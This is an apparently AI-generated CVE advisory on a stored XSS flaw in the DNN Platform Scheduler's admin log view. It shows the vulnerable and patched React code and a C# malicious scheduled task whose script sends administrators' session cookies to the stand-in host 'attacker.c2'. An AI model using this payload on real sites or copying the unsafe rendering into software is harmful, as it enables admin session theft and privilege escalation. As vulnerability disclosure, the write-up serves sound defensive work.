CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-24836

Trust Issues in the Scheduler: Deep Dive into CVE-2026-24836

Alon Barad
Alon Barad
Software Engineer

Jan 28, 2026·6 min read·22 visits

Executive Summary (TL;DR)

DNN Scheduler logs aren't just for reading errors anymore; they're for executing them. Malicious scheduled tasks can write JavaScript into the 'LogNotes' field. When an admin views the history in the PersonaBar UI, the script executes. CVSS 7.7. Fixed in 9.13.10 and 10.2.0.

A Stored Cross-Site Scripting (XSS) vulnerability in the DNN Platform's Scheduler allows malicious tasks to embed scripts in execution logs. These logs are subsequently rendered unsanitized in the Administrative PersonaBar, leading to session hijacking or privilege escalation.

The Hook: Logs Are Boring (Until They Bite)

Every major CMS has a scheduler. It’s the janitor of the application, running in the background, cleaning up temp files, sending newsletters, and generally doing the unglamorous work. In DNN (formerly DotNetNuke), this is handled by the Scheduler system. Developers write tasks, the system runs them, and—crucially—it records what happened.

Usually, nobody looks at these logs unless something breaks. But in security, the boring places are often the most lucrative. We tend to sanitize user input at the front gate (forms, URL parameters), but we implicitly trust data coming from the database. "I put it there, so it must be safe," thinks the developer.

CVE-2026-24836 is the classic counter-argument to that philosophy. It turns the system's own diagnostic history into a weapon, proving once again that in a web application, all data is potentially hostile, even if it comes from your own backend.

The Flaw: Reacting Badly

The vulnerability lives in the PersonaBar, DNN's modern, React-based administrative interface. Specifically, it resides in the component responsible for displaying the ScheduleHistory. When a scheduled task runs, it populates a ScheduleHistoryItem object, which includes a property called LogNotes. This is meant for text: "Job started," "Job finished," "Error at line 42."

However, the PersonaBar frontend treated this field with a little too much respect. Instead of rendering it as plain text, it seemingly rendered it as HTML. In the React world, this is usually achieved via the ominously named dangerouslySetInnerHTML. The developers likely wanted to allow bold text or simple formatting in logs to make them readable.

Unfortunately, this created a Stored XSS vector. If a scheduled task writes <script>alert(1)</script> into its log notes, the database happily stores it. Later, when an administrator navigates to Settings > Scheduler > History to check on system health, the browser receives the payload from the API and executes it immediately in the context of the administrative session.

The Code: The Smoking Gun

Let's look at how the data flows. The root issue isn't just in one place; it's a failure of the API to sanitize and the UI to encode. Here is a reconstruction of the vulnerable pattern.

The Vulnerable API (Conceptual): The backend simply serializes the history object directly to JSON, including the raw LogNotes string.

// Dnn.PersonaBar.Scheduling.Services.SchedulingController
[HttpGet]
public HttpResponseMessage GetScheduleHistory(int itemId)
{
    var historyItem = _schedulerRepository.GetHistory(itemId);
    // Returns the object as-is, with malicious LogNotes intact
    return Request.CreateResponse(HttpStatusCode.OK, historyItem);
}

The Vulnerable Frontend (Conceptual): The React component receives the JSON and forces HTML rendering.

// SchedulerHistoryDetail.jsx
const HistoryLog = ({ logNotes }) => {
    return (
        <div className="log-container">
            <h3>Execution Log</h3>
            {/* The deadly instruction */}
            <div dangerouslySetInnerHTML={{ __html: logNotes }} />
        </div>
    );
};

The Fix: The remediation strategy adopted in versions 9.13.10 and 10.2.0 involves ensuring the data is clean before it leaves the server or enforcing strict encoding on the client. The safest patch removes the HTML interpretation entirely:

// Patched SchedulerHistoryDetail.jsx
const HistoryLog = ({ logNotes }) => {
    return (
        <div className="log-container">
             {/* Now rendered as safe text */}
            <pre>{logNotes}</pre>
        </div>
    );
};

The Exploit: Planting the Mine

Exploiting this requires the ability to create or modify a scheduled task. This sets the bar at "High Privilege" (PR:H) for the initial infection, but don't let that fool you. This is a Persistence and Lateral Movement vector. If an attacker compromises a lower-level admin account or finds an injection flaw in an existing module, they can plant this time bomb to target the SuperUser.

Here is how a malicious extension implements the payload:

using DotNetNuke.Services.Scheduling;
 
namespace EvilCorp.Modules
{
    public class TrojanTask : SchedulerClient
    {
        public TrojanTask(ScheduleHistoryItem objScheduleHistoryItem) 
            : base(objScheduleHistoryItem)
        {
        }
 
        public override void DoWork()
        {
            try
            {
                this.Progressing();
                
                // 1. Construct the payload
                // This script creates a hidden admin user or steals the session cookie
                string payload = @"<script>
                    var i = new Image();
                    i.src = 'https://attacker.c2/log?cookie=' + document.cookie;
                    </script>";
 
                // 2. Inject into the LogNotes
                this.ScheduleHistoryItem.LogNotes = "Task completed successfully... " + payload;
                
                // 3. Save to database
                this.ScheduleHistoryItem.Succeeded = true;
            }
            catch (Exception ex)
            {
                this.ScheduleHistoryItem.Succeeded = false;
                this.Errored(ref ex);
            }
        }
    }
}

Once this task runs (which can be automated via the Scheduler), the trap is set. The next time the SysAdmin checks the logs to see why the server is slow, the script executes.

The Impact: Game Over for Admins

Why is this dangerous if you need high privileges to plant it? Context matters. In large DNN implementations, duties are often segregated. A developer or a lower-tier content admin might have permission to deploy modules but not to access the Host (SuperUser) settings.

By exploiting this, the attacker pivots:

  1. Session Hijacking: The LogNotes are displayed in the administrative context. The XSS executes with the cookies of the viewer (the SuperUser).
  2. Privilege Escalation: The script can issue AJAX requests to the PersonaBar API to create a new SuperUser account or reset the Host password.
  3. Worming: The script could modify other scheduled tasks, ensuring the payload is written repeatedly, even if the original malicious task is deleted.

Since the CVSS scope is Changed (S:C), this acknowledges that the vulnerability in the application layer impacts the security of the user (the administrator) and potentially the server infrastructure management.

Mitigation: Scrubbing the Logs

The fix is straightforward: Stop trusting the database. If you are running DNN Platform, you are likely vulnerable if you are between versions 9.0.0 and 9.13.10.

Immediate Action: Upgrade to v9.13.10 or v10.2.0. These versions force the Scheduler UI to handle log notes safely.

Workarounds (If you can't upgrade):

  1. Database Pruning: If you suspect a breach, manually truncate the ScheduleHistory table in SQL Server (TRUNCATE TABLE {objectQualifier}ScheduleHistory). This destroys the evidence (and the XSS payloads) but keeps the system running.
  2. WAF Filters: Configure your Web Application Firewall to block requests containing <script> tags, although this might not catch base64 encoded payloads or obscure vectors if the insertion happens via a compiled DLL.
  3. Access Control: Restrict who can install extensions. If they can't upload the DLL, they can't schedule the task.

Official Patches

DNN SoftwareOfficial Release 9.13.10

Fix Analysis (1)

Technical Appendix

CVSS Score
7.7/ 10
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
EPSS Probability
0.04%
Top 89% most exploited

Affected Systems

DNN Platform 9.x (< 9.13.10)DNN Platform 10.x (< 10.2.0)

Affected Versions Detail

Product
Affected Versions
Fixed Version
DNN Platform
DNN Software
>= 9.0.0, < 9.13.109.13.10
DNN Platform
DNN Software
>= 10.0.0, < 10.2.010.2.0
AttributeDetail
CWE IDCWE-79
CVSS v3.17.7 (High)
Attack VectorNetwork (Stored)
Privileges RequiredHigh (to schedule task)
User InteractionRequired (Admin views logs)
EPSS Score0.00038

MITRE ATT&CK Mapping

T1059.007Command and Scripting Interpreter: JavaScript
Execution
T1546Event Triggered Execution
Persistence
T1189Drive-by Compromise
Initial Access
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Known Exploits & Detection

Internal ResearchTheoretical PoC involving custom SchedulerClient implementation.

Vulnerability Timeline

Patch Developed (Release Candidate)
2025-04-29
Vulnerability Published
2026-01-27
NVD Analysis Completed
2026-01-28

References & Sources

  • [1]GHSA Advisory
  • [2]NVD Record

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 23 hours ago•CVE-2026-63462
7.5

CVE-2026-63462: Unauthenticated Stack Overflow Denial of Service in Unleash Server

An unauthenticated remote denial of service vulnerability exists in the Unleash feature management platform. By submitting a crafted JSON payload containing deeply nested structures to an OpenAPI-validated endpoint, an attacker can trigger uncontrolled recursion within the error formatting module. This leads to a call-stack exhaustion (RangeError: Maximum call stack size exceeded) inside the Node.js runtime, causing the service to crash immediately without recovery.

Alon Barad
Alon Barad
8 views•6 min read
•1 day ago•CVE-2026-63004
5.5

CVE-2026-63004: Server-Side Request Forgery in Unleash Addon and Integration Subsystem

CVE-2026-63004 is a server-side request forgery (SSRF) vulnerability in the Unleash feature management platform. Authenticated administrators with CREATE_ADDON or UPDATE_ADDON privileges can exploit this vulnerability to initiate requests to loopback addresses, private networks, and cloud metadata endpoints, potentially leading to information disclosure and credential extraction.

Amit Schendel
Amit Schendel
7 views•8 min read
•1 day ago•CVE-2026-63466
4.1

CVE-2026-63466: Process-Wide Security Degradation via Global Module Mutation in Unleash

Prior to version 8.0.3, Unleash's Markdown event formatter directly mutated the global template-escaping function of the shared mustache Node.js module, resulting in a process-wide security degradation where HTML/Markdown escaping was permanently disabled for the application lifetime.

Alon Barad
Alon Barad
3 views•6 min read
•1 day ago•CVE-2026-76904
9.8

CVE-2026-76904: Unauthenticated SQL Injection in GeoTools PostGIS DataStore Component

A critical SQL injection vulnerability exists in the GeoTools open-source Java library. This vulnerability is situated within the post-processing phase of OGC Filter conversion inside the PostGIS DataStore module. Specifically, the `jsonArrayContains` function does not validate or sanitize its arguments before constructing PostgreSQL SQL/JSON path evaluation queries. An unauthenticated remote attacker can exploit this weakness by submitting crafted filters via standard OGC services like WFS or WMS to execute arbitrary SQL commands on the underlying database system.

Alon Barad
Alon Barad
8 views•5 min read
•1 day ago•CVE-2026-61824
8.2

CVE-2026-61824: High-Severity Cross-Site Scripting (XSS) via Unsanitized Site Extractors in Defuddle

CVE-2026-61824 is a high-severity Cross-Site Scripting (XSS) vulnerability in kepano/defuddle before version 0.19.1. Custom site extractors for platforms such as X/Twitter, Substack, and YouTube constructed HTML representations via template string interpolation without output escaping. This allowed malicious pages to bypass standard parser sanitization routines and execute arbitrary JavaScript.

Amit Schendel
Amit Schendel
5 views•7 min read
•1 day ago•CVE-2026-63421
7.5

CVE-2026-63421: Query Limit Bypass via Negative Integer Input in KeystoneJS core resolvers

A high-severity vulnerability exists in KeystoneJS, a popular Node.js CMS and GraphQL framework, where the query resolution engine fails to validate signed negative integers within the pagination subsystem. Unauthenticated remote attackers can leverage this flaw to bypass the 'graphql.maxTake' safety boundary. By sending large negative values in the 'take' query parameter, the underlying Prisma ORM interprets the value as an instruction to fetch rows from the end of the collection, allowing malicious actors to bypass pagination limits, trigger database resource exhaustion, and execute application-level Denial of Service (DoS) attacks.

Alon Barad
Alon Barad
5 views•6 min read